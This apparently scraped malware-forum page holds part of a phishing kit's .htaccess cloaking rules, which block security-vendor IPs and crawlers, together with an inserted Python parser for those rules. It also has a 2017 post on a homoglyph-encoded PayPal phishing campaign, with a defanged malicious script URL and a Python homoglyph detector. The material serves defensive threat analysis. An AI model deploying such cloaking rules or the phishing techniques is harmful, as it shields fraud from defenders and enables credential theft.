RewriteCond %{HTTP_USER_AGENT} "www.abot.com" [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} xirq [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} yottashopping [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} zao/ [NC,OR] # experimental Japan crawler 
RewriteCond %{HTTP_USER_AGENT} zedzo [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} zeus [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} zspider [NC,OR] 
RewriteCond %{HTTP_REFERER} iaea.org [NC,OR] # spam bot 
RewriteCond %{HTTP_REFERER} wizard.yellowbrick.oz [NC,OR] # spam bot 
RewriteCond %{HTTP_REFERER} brandimensions [NC,OR] # bandidth waster 
RewriteCond %{HTTP_REFERER} imgurl= [NC,OR] 
RewriteCond %{HTTP_REFERER} imgrefurl= [NC,OR] 
RewriteCond %{REMOTE_ADDR} ^193.95.([1-2][0-9][0-9]). [NC,OR] # slovenia etc 
RewriteCond %{REMOTE_ADDR} ^203.147.([0-4][0-9]). [NC,OR] # thailand 
RewriteCond %{REMOTE_ADDR} ^80.87.([3-9][0-9]). [NC,OR] # ghana russia etc 
RewriteCond %{REMOTE_ADDR} ^80.88.(1[0-5][0-9]). [NC,OR] 
RewriteCond %{REMOTE_ADDR} ^203.87.(1[2-9][0-9]). [NC,OR] # philippines 
RewriteCond %{REMOTE_ADDR} ^218.(1[0-9][0-9]). [NC,OR] # china korea 
RewriteCond %{REMOTE_ADDR} ^211.([1-9][0-9]). [NC,OR] # china korea 
RewriteCond %{REMOTE_ADDR} ^66.150.55.(2[2-3][0-9]). [NC,OR] # findwhat.com stealth bot 
RewriteCond %{REMOTE_ADDR} ^64.110.([4-9][0-9]). [NC,OR] 
RewriteCond %{REMOTE_ADDR} ^64.110.(1[0-8][0-9]). [NC] 
RewriteRule .* - [F,L] 
Options -Indexes  
Attachment: infected (918.94 KiB), downloaded 61 times
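Added example, not part of the post or of the kit: a small Python triage helper that parses the two blocking mechanisms in the .htaccess above (the `deny from` list inside `<Limit>` and the `RewriteCond` chain that ends in `RewriteRule .* - [F,L]`) and reports whether a given analysis host, identified by IP and User-Agent, would be refused by the kit. The embedded excerpt is constructed from lines of the file above; Apache does not accept trailing `#` comments on directive lines, so the parser strips them before matching.

```python
import ipaddress
import re
from dataclasses import dataclass

# Constructed excerpt of the kit's .htaccess, in the syntax used above.
# Apache rejects inline '#' comments on directive lines (mod_rewrite reports
# "bad flag delimiters"), so parse_htaccess() strips them before matching.
SAMPLE_HTACCESS = r"""
deny from 208.223.208.181     # security-lab1.juniper.net
deny from 63.148.99.          # Cyveillance.com bandwidth waster
deny from 82.80.              # israel
allow from all
RewriteCond %{HTTP_USER_AGENT} ^-?$ [NC,OR] # blank user-agent
RewriteCond %{HTTP_USER_AGENT} wget [NC,OR] # OD
RewriteCond %{HTTP_USER_AGENT} "lwp\:\:simple" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} java [NC,OR] # generic textbook bots
RewriteCond %{REMOTE_ADDR} ^66.150.55.(2[2-3][0-9]). [NC,OR] # findwhat.com stealth bot
RewriteCond %{REMOTE_ADDR} ^64.110.(1[0-8][0-9]). [NC]
RewriteRule .* - [F,L]
"""

DENY_RE = re.compile(r"^deny\s+from\s+(\S+)", re.IGNORECASE)
COND_RE = re.compile(
    r'^RewriteCond\s+%\{(\w+)\}\s+("(?:[^"\\]|\\.)*"|\S+)(?:\s+\[([^\]]*)\])?'
)


@dataclass
class Cond:
    var: str       # HTTP_USER_AGENT, REMOTE_ADDR, ...
    pattern: str   # PCRE pattern; evaluated here with Python's re
    nocase: bool   # [NC]
    or_next: bool  # [OR]: OR-ed with the condition that follows


def deny_to_network(host):
    """Map `deny from` host syntax to an IPv4 network.

    `a.b.c.d` denies one host; a partial address such as `82.80.` denies the
    whole /16, because mod_authz_host treats 1-3 leading octets as a prefix.
    Hostnames and `all` are not handled in this example.
    """
    if "/" in host:
        return ipaddress.ip_network(host, strict=False)
    octets = [o for o in host.strip(".").split(".") if o]
    if not octets or len(octets) > 4 or not all(o.isdigit() for o in octets):
        return None
    padded = ".".join(octets + ["0"] * (4 - len(octets)))
    return ipaddress.ip_network("%s/%d" % (padded, 8 * len(octets)), strict=False)


def parse_htaccess(text):
    """Return (list of denied networks, list of RewriteCond entries)."""
    denies, conds = [], []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()     # drop the inline comments
        if not line:
            continue
        m = DENY_RE.match(line)
        if m:
            net = deny_to_network(m.group(1))
            if net is not None:
                denies.append(net)
            continue
        m = COND_RE.match(line)
        if m:
            var, pat, flags = m.groups()
            if len(pat) >= 2 and pat[0] == pat[-1] == '"':
                pat = pat[1:-1]
            flagset = {f.strip().upper() for f in (flags or "").split(",")}
            conds.append(Cond(var, pat, "NC" in flagset, "OR" in flagset))
    return denies, conds


def conds_match(conds, env):
    """Evaluate a RewriteCond chain as mod_rewrite does: [OR] conditions form
    a group, and every group must hold for the following RewriteRule to fire."""
    group_hit = False
    for c in conds:
        if re.search(c.pattern, env.get(c.var, ""), re.IGNORECASE if c.nocase else 0):
            group_hit = True
        if not c.or_next:            # last member of a group closes it
            if not group_hit:
                return False
            group_hit = False
    return True


def is_blocked(remote_addr, user_agent, htaccess=SAMPLE_HTACCESS):
    """Return the directive that would refuse this client, or None."""
    denies, conds = parse_htaccess(htaccess)
    ip = ipaddress.ip_address(remote_addr)
    for net in denies:
        if ip in net:
            return "deny from %s" % net
    env = {"REMOTE_ADDR": remote_addr, "HTTP_USER_AGENT": user_agent}
    if conds and conds_match(conds, env):
        return "RewriteRule .* - [F,L]"
    return None


if __name__ == "__main__":
    # 66.150.55.230 is NOT caught by the REMOTE_ADDR pattern: the trailing '.'
    # in ^66.150.55.(2[2-3][0-9]). needs one more character after the last octet.
    for addr, ua in [("208.223.208.181", "Mozilla/5.0"), ("198.51.100.7", "Wget/1.21"),
                     ("66.150.55.230", "Mozilla/5.0"), ("198.51.100.7", "")]:
        print(addr, repr(ua), "->", is_blocked(addr, ua))
```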
 #30877  by c0d3inj3cT
 Mon Oct 02, 2017 7:10 am
Ongoing PayPal phishing campaign with email bodies encoded using a homographic technique to bypass static analysis.

Write-up and details are here: http://www.pwncode.club/2017/10/paypal- ... -body.html

External JS used to dynamically load the PayPal HTML Form: hxxp://www.solutionivy.com/e1e99eb37b7fcecc7a18df3db5e65aac.js (Block it at network level).

HTML sample MD5 hashes:

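Added example, not from the post or the write-up it links: a Python check that reverses the homoglyph encoding the post describes before running static keyword matching, and flags words that mix scripts. The lookalike table and the email body are constructed for the example; a production tool would load the full confusables list from Unicode Technical Standard #39 instead of the excerpt below.

```python
import re
import unicodedata

# Constructed, deliberately small lookalike table: Cyrillic and Greek letters
# that render like Latin ones. A real tool would load the full confusables.txt
# from Unicode Technical Standard #39 instead of this excerpt.
CONFUSABLES = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0443": "y", "\u0445": "x", "\u0456": "i", "\u0458": "j", "\u04bb": "h",
    "\u0410": "A", "\u0412": "B", "\u0415": "E", "\u041a": "K", "\u041c": "M",
    "\u041d": "H", "\u041e": "O", "\u0420": "P", "\u0421": "C", "\u0422": "T",
    "\u0425": "X", "\u0391": "A", "\u0392": "B", "\u0395": "E", "\u0397": "H",
    "\u0399": "I", "\u039a": "K", "\u039c": "M", "\u039d": "N", "\u039f": "O",
    "\u03a1": "P", "\u03a4": "T", "\u03bf": "o",
}
# Invisible characters that split a keyword without changing how it renders.
INVISIBLE = dict.fromkeys(map(ord, "\u200b\u200c\u200d\u2060\ufeff\u00ad"), None)

KEYWORDS = ("paypal", "account", "verify", "limited", "password")

# Constructed phishing body: Latin text with a few Cyrillic substitutions
# and a zero-width space inside "verify".
SAMPLE_BODY = (
    "Dear customer, your P\u0430yP\u0430l \u0430\u0441\u0441\u043eunt has been "
    "l\u0456mited. Please v\u0435r\u200bify your p\u0430ssw\u043erd within 24 hours."
)


def normalize(text):
    """Undo the substitutions the homographic encoding relies on."""
    text = unicodedata.normalize("NFKC", text)   # fullwidth forms, ligatures
    text = text.translate(INVISIBLE)              # zero-width separators
    return "".join(CONFUSABLES.get(ch, ch) for ch in text)


def mixed_script_words(text):
    """Words mixing Latin with another script. Genuine words stay in one
    script, so a mix is a strong indicator of confusable substitution."""
    flagged = []
    for word in re.findall(r"\w+", text):
        scripts = {unicodedata.name(ch, "UNKNOWN").split()[0]
                   for ch in word if ch.isalpha()}
        if len(scripts) > 1:
            flagged.append(word)
    return flagged


def keyword_hits(text):
    low = text.lower()
    return [k for k in KEYWORDS if k in low]


def scan_body(body):
    """Compare naive keyword matching with matching after normalization."""
    return {
        "raw_hits": keyword_hits(body),
        "normalized_hits": keyword_hits(normalize(body)),
        "mixed_script_words": mixed_script_words(body),
    }


if __name__ == "__main__":
    for key, value in scan_body(SAMPLE_BODY).items():
        print(key, value)
```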